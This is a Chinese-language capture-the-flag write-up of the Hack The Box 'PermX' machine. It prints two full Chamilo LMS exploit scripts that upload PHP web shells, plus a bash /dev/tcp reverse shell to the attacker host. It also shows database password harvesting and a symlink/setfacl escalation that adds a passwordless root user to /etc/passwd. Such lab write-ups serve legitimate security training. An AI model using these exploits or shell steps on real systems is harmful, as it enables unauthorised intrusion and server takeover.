HTB:PermX[WriteUP]

目录

连接至HTB服务器并启动靶机

1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

3.On what subdomain of permx.htb is there an online learning platform?

使用ffuf对该域名进行子域名FUZZ

使用浏览器直接访问该子域

4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

使用浏览器访问子域下robots.txt文件

6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

启动Metasploit

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

7.What user is the webserver running as on PermX?

8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

9.Submit the flag located in the mtz user's home directory.

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

10.What is the full path to the script that the mtz user can run as any user without a password?

11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539


连接至HTB服务器并启动靶机

靶机IP:10.10.11.23

分配IP:10.10.14.12


1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

由扫描结果可见,靶机开放端口:22、80共2个端口


2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1

由输出可见,直接访问靶机IP将被重定位至:permx.htb


3.On what subdomain of permx.htb is there an online learning platform?

将靶机IP与域名进行绑定

echo '10.10.11.23 permx.htb' >> /etc/hosts

使用ffuf对该域名进行子域名FUZZ

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

再次将靶机IP与该子域进行绑定

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

使用浏览器直接访问该子域

搜索Chamilo,可见该子域:lms.permx.htb托管一个在线学习平台


4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

可见该页面所用WebAPP为:Chamilo(CMS)


5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

使用浏览器访问子域下robots.txt文件

进入documentation目录下

由该页面标题可见,该CMS版本为:1.11


6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

对该CMS进行漏洞搜索

searchsploit Chamilo

将RCE相关的EXP拷贝到当前目录下

searchsploit -m 49867.py

查看该EXP代码

cat 49867.py 
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/from requests import Session
from random import choice
from string import ascii_lowercaseimport requests# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"def main():# Run a context manager with a session object to hold login session after loginwith Session() as s:login_url = f"{url}index.php"login_data = {"login": user_name,"password": password}r = s.post(login_url, data=login_data) # login request# Check to see if login as admin user was successful.if "admin" not in r.url:print(f"[-] Login as {user_name} failed. Need to be admin")returnprint(f"[+] Logged in as {user_name}")print(f"[+] Cookie: {s.cookies}")file_upload_url = f"{url}main/upload/upload.php"# The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as wellphp_webshell_file = {"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),"user_upload": (webshell_name, content)}## Good command if you want to see what the request looks like without sending# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))# Two requests required to actually upload the filefor i in range(2):s.post(file_upload_url, files=php_webshell_file)exploit_request_url = f"{url}{webshell_path}{webshell_name}"print("[+] Upload complete!")print(f"[+] Webshell: {exploit_request_url}")# This is a GET request to the new webshell to trigger code executioncommand_output = s.get(exploit_request_url)print("[+] Command output:\n")print(command_output.text)if __name__ == "__main__":main()

由该EXP注释可知,该EXP基于漏洞:CVE-2021-31933。好像并不是我们要找的2023漏洞

启动Metasploit

msfconsole

搜索Chamilo相关模块

search Chamilo

可见该漏洞模块无需认证可直接代码注入导致RCE,切换至该模块

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

查看该模块信息

info

从模块描述可见,该模块基于漏洞:CVE-2023-34960

往上一填,发现答案居然不对,才发现是要找存储型XSS漏洞

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

stored cross-site进行搜索

该漏洞允许无认证文件执行JS脚本与上传Webshell:CVE-2023-4220


7.What user is the webserver running as on PermX?

我这边直接到Github上寻找该漏洞相关EXP

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-# Name       : CVE-2023-4220
# Autor      : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shellimport argparse
import requests
import time
from os import system
import io# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'def arguments():global argsparser = argparse.ArgumentParser()parser.add_argument( '-t', '--target', required=True ,help='Enter the target domain, for example: http://example.com' )args = parser.parse_args()def check_url_exists(url):print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')try:response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)if response.status_code == 200:is_vuln()try:response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)if response2.status_code == 200:print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')else:upload_file(args.target)except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falseelse:print(f'Error {url}')except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falsedef upload_file(url):new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?phpif(isset($_GET['cmd'])){system($_GET['cmd'] . ' 2>&1');}
?>
</pre>
</body>
</html>
"""file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))file_like_object.name = 'insomnia.php'  files = {'bigUploadFile': file_like_object}response3 = requests.post(new_url, files=files)print(response3.status_code)print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')def is_vuln():print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)    def target(url):print(blue ,f'             URL: {url}')time.sleep(3)system("clear")    def banner():textBanner = rf"""/ __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )\___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""print(green,textBanner)print(yellow,'                                                                            by Insomnia (Jacob S.)')def main():arguments()banner()target(args.target)check_url_exists(args.target)if __name__ == '__main__':main()

直接使用该EXP开始漏洞利用

python exploit.py -t http://lms.permx.htb/

直接访问EXP提供的URL,执行whoami命令

由回显可见,当前用户为:www-data


8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

nc -lvnp 1425

通过EXP提供的Webshell反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
<ilo/main/inc/lib/javascript/bigupload/files$ whoami                     
www-data

提升TTY

script -c /bin/bash -q /dev/null

搜索WebAPP下所有可能的配置相关文件并输出为列表

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

逐个查看文件内容,并匹配'password'字段

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

查询该字段出处:03F6lY3uXAP2bkW8

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
<lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php

从该文件中找出匹配字符串并输出上下5行

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
<bkW8' /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

/**
 * Directory settings.

账户:chamilo

密码:03F6lY3uXAP2bkW8

总结一下,该文件存储着数据库连接信息:/var/www/chamilo/app/config/configuration.php


9.Submit the flag located in the mtz user's home directory.

查看靶机支持登录的用户

cat /etc/passwd

尝试使用该用户对靶机进行SSH服务登录

ssh mtz@10.10.11.23 

查询user_flag位置并查看其内容

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9

USER_FLAG:7239022c6248c28ed2945734c9e07ac9


10.What is the full path to the script that the mtz user can run as any user without a password?

查看该用户可无密码特权运行的命令

sudo -l

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

存在文件可无密码特权运行:/opt/acl.sh


11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

通过脚本内容可知,该脚本运行后允许在/home/mtz目录下赋任意链接任意权限


12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

尝试创建连接test,连接至/etc/passwd

ln -s /etc/passwd /home/mtz/test

通过/opt/acl.sh脚本为/home/mtz/test链接赋读写权限

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv  test  user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

/home/mtz/test链接中写入新用户

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

切换到0dayhp用户bash

su 0dayhp

查找root_flag位置并查看其内容

root@permx:/home/mtz# find / -name 'root.txt'
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/465532.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Imperva 数据库与安全解决方案

Imperva是网络安全解决方案的专业提供商&#xff0c;能够在云端和本地对业务关键数据和应用程序提供保护。公司成立于 2002 年&#xff0c;拥有稳定的发展和成功历史并于 2014 年实现产值1.64亿美元&#xff0c;公司的3700多位客户及300个合作伙伴分布于全球各地的90多个国家。…

python验证码滑块图像识别

文章目录 1、案例图片1、需求说明2、代码实现总结 1、案例图片 1、需求说明 python 3.10,写一个滑块验证码的自动化程序。需要一个opencv的函数&#xff0c;能准确的计算&#xff0c;在这同一张图片上&#xff0c;滑块形状和缺口形状的坐标位置及两个形状之间在X轴上的距离。请…

「Mac畅玩鸿蒙与硬件16」鸿蒙UI组件篇6 - List 和 Grid 组件展示数据列表

List 和 Grid 是鸿蒙开发中的核心组件&#xff0c;用于展示动态数据。List 适合展示垂直或水平排列的数据列表&#xff0c;而 Grid 则适用于展示商品或图片的网格布局。本篇将展示如何封装组件&#xff0c;并通过按钮实现布局切换&#xff0c;提升界面的灵活性和用户体验。 关键…

「Mac畅玩鸿蒙与硬件25」UI互动应用篇2 - 计时器应用实现

本篇将带领你实现一个实用的计时器应用&#xff0c;用户可以启动、暂停或重置计时器。该项目将涉及时间控制、状态管理以及按钮交互&#xff0c;是掌握鸿蒙应用开发的重要步骤。 关键词 UI互动应用时间控制状态管理用户交互 一、功能说明 在这个计时器应用中&#xff0c;用户…

群控系统服务端开发模式-应用开发-上传工厂开发

现在的文件、图片等上传基本都在使用oss存储。而现在常用的oss存储有阿里云、腾讯云、七牛云、华为云等&#xff0c;但是用的最多的还是前三种。而我主要封装的是本地存储、阿里云存储、腾讯云存储、七牛云存储。废话不多说&#xff0c;直接上传设计图及说明&#xff0c;就一目…

Hadoop生态圈框架部署(五)- Zookeeper完全分布式部署

文章目录 前言一、Zookeeper完全分布式部署&#xff08;手动部署&#xff09;1. 下载Zookeeper2. 上传安装包2. 解压zookeeper安装包3. 配置zookeeper配置文件3.1 创建 zoo.cfg 配置文件3.2 修改 zoo.cfg 配置文件3.3 创建数据持久化目录并创建myid文件 4. 虚拟机hadoop2安装并…

UI设计师们,AI留给你们的窗口期没多少了得亏生成的模型不能编辑

对于 UI 设计师们来说&#xff0c;AI 的发展确实带来了一定的挑战。 虽然目前生成的模型不能编辑&#xff0c;但谁也无法确定未来的发展走向。 然而&#xff0c;设计师们也不必过分担忧。人类的创造力、审美能力和对用户需求的深刻理解是无法被轻易取代的。 设计师可以利用这…

Gerrit 2.12.2 window版本部署

背景&#xff1a;原有gerritgit服务器一套&#xff08;以下称老gerrit&#xff09;&#xff0c;现在需要在备份机器上面也搭建一套gerrit(以下称新gerrit)。 目前老gerrit服务器信息为&#xff1a;centos gerrit 2.12.2jdk1.8mysql5.1.73nginx 新gerrit服务器信息为&#xf…

一文搞懂Linux kernel编译步骤

一、前言 什么是Linux的内核编译呢&#xff1f;简单来说&#xff0c;Linux内核编译是一个将内核源代码转换成可在特定的硬件架构上运行的二进制文件的过程。通过编译内核&#xff0c;我们可以根据自己的需求和兴趣对内核进行定制和优化&#xff0c;以满足特定的应用场景。下文…

CST汽车天线仿真(双向混合求解)

CST从2018版本开始具有双向混合求解&#xff0c;到2019版已经通用微波工作室的各个求解器之间的双向混合。具体的混合对象如下图&#xff1a; 对天线的安装和耦合仿真&#xff0c;意味着对复杂结构&#xff08;天线&#xff09;和电大尺寸环境&#xff08;安装平台&#xff0c;…

leetcode-5-最长回文子串

题解&#xff1a; 回文串&#xff1a;如果一个字符串正着读和反着读都是一样的那这个字符串就是回文串。 对于一个子串而言&#xff0c;如果它是回文串&#xff0c;并且长度大于 2&#xff0c;那么将它首尾的两个字母去除之后&#xff0c;它仍然是个回文串。 1、初始化字典d…

Python反射API:面向对象编程的“魔法镜”

在Python的世界里&#xff0c;面向对象编程&#xff08;OOP&#xff09;就像是一场盛大的化妆舞会&#xff0c;每个对象都穿着华丽的外衣&#xff0c;隐藏着自己的真实面目。而Python的反射API&#xff0c;就像是一面“魔法镜”&#xff0c;能够让我们窥探这些对象的真实身份和…

Python练习8

Python日常练习 题目&#xff1a; 编写函数&#xff0c;接收两个正整数作为参数&#xff0c;返回一个元组&#xff0c; 其中第一个元数为最大公约数&#xff0c;第二个元素为最小公倍数。 例如&#xff1a; 若输入12&#xff0c;8&#xff0c;则输出如下 【请输入一个…

推荐程序员好用的浏览器插件

推荐程序员好用的浏览器插件 1. 网页颜色控制&#xff1a;Dark Reader安装效果 2. 前端助手&#xff1a;FeHelper安装效果 3. markdown可视化&#xff1a;Markdown Reader安装效果 4. ES插件&#xff1a;Multi Elasticsearch Heads安装效果 1. 网页颜色控制&#xff1a;Dark Re…

希尔排序算法

1、基本思想 希尔排序也称缩小增量排序&#xff0c;是插入排序的一种更高效的改进版本。它的基本思想是先将待排序的数组元素按照一定的间隔&#xff08;称为增量&#xff09;分成若干个子序列&#xff0c;分别对这些子序列进行插入排序&#xff0c;随着迭代的进行&#xff0c;…

太速科技-634-基于3U PXIe的VU3P FMC+数据接口板

基于3U PXIe的VU3P FMC数据接口板 一、产品概述 板卡是一款基于 3U PXIE 总线架构的高性能数据预处理FMC 载板&#xff0c;具有 1 个 FMC&#xff08;HPC&#xff09;接口&#xff0c;1 个 X8 GTH 背板互联接口&#xff0c;可以实现 1 路 PCIe x8。板卡主控芯片采用Xilin…

OpenCV基本操作(python开发)——(8)实现芯片瑕疵检测

OpenCV基本操作&#xff08;python开发&#xff09;——&#xff08;1&#xff09; 读取图像、保存图像 OpenCV基本操作&#xff08;python开发&#xff09;——&#xff08;2&#xff09;图像色彩操作 OpenCV基本操作&#xff08;python开发&#xff09;——&#xff08;3&…

MySQL数据库中的视图

视图 ​ 本篇将开始介绍有关数据库中视图的相关知识点&#xff0c;其中主要包含视图的基本使用&#xff0c;视图规则和限制。 ​ 视图是一个虚拟表&#xff0c;其内容由查询定义。同真实的表一样&#xff0c;视图包含一系列带有名称的列和行数据&#xff0c;视图的数据变化会…

Docker 镜像拉不动?自建 Docker Hub 加速站 解决镜像拉取失败

本文首发于只抄博客&#xff0c;欢迎点击原文链接了解更多内容。 前言 众所周知&#xff0c;6 月份的时候&#xff0c;Docker Hub 的镜像就已经无法正常拉取&#xff0c;那会随手用 Nginx 反代了一下 Docker Hub&#xff0c;建了个自用的镜像站&#xff0c;一直用到了 9 月份&…

应对传统能源企业管理人员青黄不接问题:搭建系统完善的招聘管理体系

应对传统能源企业管理人员青黄不接问题&#xff1a;搭建系统完善的招聘管理体系 对于很多传统能源企业由于成立时间久&#xff0c;发展到现在&#xff0c;往往都面临着一个共性问题&#xff0c;即未来三到五年&#xff0c;老员工退休后&#xff0c;新员工如何接续的问题。这个…